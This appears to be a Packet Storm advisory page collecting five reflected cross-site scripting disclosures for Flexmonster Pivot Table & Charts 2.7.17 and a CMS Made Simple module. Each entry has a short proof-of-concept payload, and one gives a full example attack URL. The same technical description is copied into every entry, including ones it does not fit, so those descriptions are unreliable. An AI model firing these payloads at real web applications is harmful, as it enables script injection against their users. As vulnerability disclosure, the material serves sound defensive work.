what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Flexmonster Pivot Table And Charts 2.7.17 Cross Site Scripting

Flexmonster Pivot Table And Charts 2.7.17 Cross Site Scripting
Posted Dec 17, 2020
Authored by Marco Nappi

Flexmonster Pivot Table and Charts version 2.7.17 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2020-20138, CVE-2020-20139, CVE-2020-20140, CVE-2020-20141, CVE-2020-20142
SHA-256 | 04c859b1aa0ff2ebf67a2432da09120d4b5948555291b55a2cd9d75664c327f7

Flexmonster Pivot Table And Charts 2.7.17 Cross Site Scripting

Change Mirror Download
# Exploit Title: CVE-2020-20140 : Cross Site Scripting (XSS) vulnerability in Remote Report component under the Open menu in Flexmonster Pivot Table & Charts 2.7.17
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: n/a
# Software Link: n/a
# Version:Flexmonster Pivot Table & Charts 2.7.17
# Tested on:Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20140

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.

payload:
<svg onload=alert("OpenRemoteReport")><!--

-------

# Exploit Title: CVE-2020-20139 : Cross Site Scripting (XSS) vulnerability in the Remote JSON component
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: n/a
# Software Link: n/a
# Version:Flexmonster Pivot Table & Charts 2.7.17
# Tested on:Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20139

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.

payload:
<svg onload=alert("OpenRemoteJSON")><!--

-------

# Exploit Title: CVE-2020-20141 : Cross Site Scripting (XSS) vulnerability in the To OLAP (XMLA) component Under the Connect menu in Flexmonster Pivot Table & Charts 2.7.17.
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: n/a
# Software Link: n/a
# Version:Flexmonster Pivot Table & Charts 2.7.17
# Tested on:Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20141

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.

payload:
<svg onload=alert("OLAPTool")><!--

-------

# Exploit Title: CVE-2020-20138 : Reflected XSS in Cms Made Simple module "Showtime2 Slideshow"
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: n/a
# Software Link: [download link if available]
# Version:Cms Made Simple - 2.2.4
# Tested on:Cms Made Simple - 2.2.4
# CVE : CVE-2020-20138

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.

example : http://<HOST>/admin/moduleinterface.php?mact=Showtime2%2Cm1_%2Caddslides%2C0&_sk_=8a5db6575606c958c74&m1_showid=1&m1_module_message=%3Csvg%20onload=alert()%3E

-------

# Exploit Title: CVE-2020-20142 :Cross Site Scripting (XSS) vulnerability in the "To Remote CSV" component under "Open" Menu in Flexmonster Pivot Table & Charts 2.7.17.
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: n/a
# Software Link: n/a
# Version:Flexmonster Pivot Table & Charts 2.7.17
# Tested on:Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20142

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.

payload:
<svg onload=alert("OpenRemoteCSV")><!--
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    34 Files
  • 28
    Feb 28th
    27 Files
  • 29
    Feb 29th
    8 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close